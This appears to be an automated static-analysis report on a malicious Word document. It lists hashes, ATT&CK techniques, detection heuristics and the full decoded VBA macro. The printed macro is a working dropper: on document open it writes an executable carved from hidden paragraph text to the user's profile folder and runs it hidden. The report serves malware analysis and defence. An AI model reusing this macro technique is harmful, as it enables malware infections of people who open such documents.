Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f156338aa057c17…

MALICIOUS

Office (OLE)

329.5 KB Created: 2011-08-01 23:40:00 Authoring application: Microsoft Office Word First seen: 2015-09-18
MD5: 5f800121164d861e48a1bd2c5fffbb4c SHA-1: ae6256018c22825a39d1c27e3c2d7eb6da749f99 SHA-256: 2f156338aa057c171a40ccc25de72059e08bffc962f65cc6884a056fc34ff590
234 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate Malicious Code

The sample contains VBA macros that, when executed, write a file named 'vYJIbejZk.exe' to the user's profile directory and then execute it. The macro code appears to be obfuscated, with parts of the executable content embedded within paragraph text and identified by the marker 'Oxkxztmbfl'. The AutoOpen macro is present and calls the main execution subroutine, indicating a clear intent to download and execute a payload.

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Wyxiu7 = Shell(Wyxiu10, vbHide)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Wyxiu2 = Environ("USERPROFILE")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.u2.com/tour/date/id/4438 In document text (OLE body)
    • http://www.u2.com/tour/date/id/4499In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1856 bytes
SHA-256: d1f4c916e79cc81f6e58ebc2e63f3594463b798a75875d5d7b94c31f0b1ecbee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
    Wyxiu12
End Sub
Sub Wyxiu12()
    Dim Wyxiu7 As Integer
    Dim Wyxiu1 As String
    Dim Wyxiu2 As String
    Dim Wyxiu3 As Integer
    Dim Wyxiu4 As Paragraph
    Dim Wyxiu8 As Integer
    Dim Wyxiu9 As Boolean
    Dim Wyxiu5 As Integer
    Dim Wyxiu11 As String
    Dim Wyxiu6 As Byte
    Dim Oxkxztmbfl As String
    Oxkxztmbfl = "Oxkxztmbfl"
    Wyxiu1 = "vYJIbejZk.exe"
    Wyxiu2 = Environ("USERPROFILE")
    ChDrive (Wyxiu2)
    ChDir (Wyxiu2)
    Wyxiu3 = FreeFile()
    Open Wyxiu1 For Binary As Wyxiu3
    For Each Wyxiu4 In ActiveDocument.Paragraphs
        DoEvents
            Wyxiu11 = Wyxiu4.Range.Text
        If (Wyxiu9 = True) Then
            Wyxiu8 = 1
            While (Wyxiu8 < Len(Wyxiu11))
                Wyxiu6 = Mid(Wyxiu11, Wyxiu8, 4)
                Put #Wyxiu3, , Wyxiu6
                Wyxiu8 = Wyxiu8 + 4
            Wend
        ElseIf (InStr(1, Wyxiu11, Oxkxztmbfl) > 0 And Len(Wyxiu11) > 0) Then
            Wyxiu9 = True
        End If
    Next
    Close #Wyxiu3
    Wyxiu13 (Wyxiu1)
End Sub
Sub Wyxiu13(Wyxiu10 As String)
    Dim Wyxiu7 As Integer
    Dim Wyxiu2 As String
    Wyxiu2 = Environ("USERPROFILE")
    ChDrive (Wyxiu2)
    ChDir (Wyxiu2)
    Wyxiu7 = Shell(Wyxiu10, vbHide)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub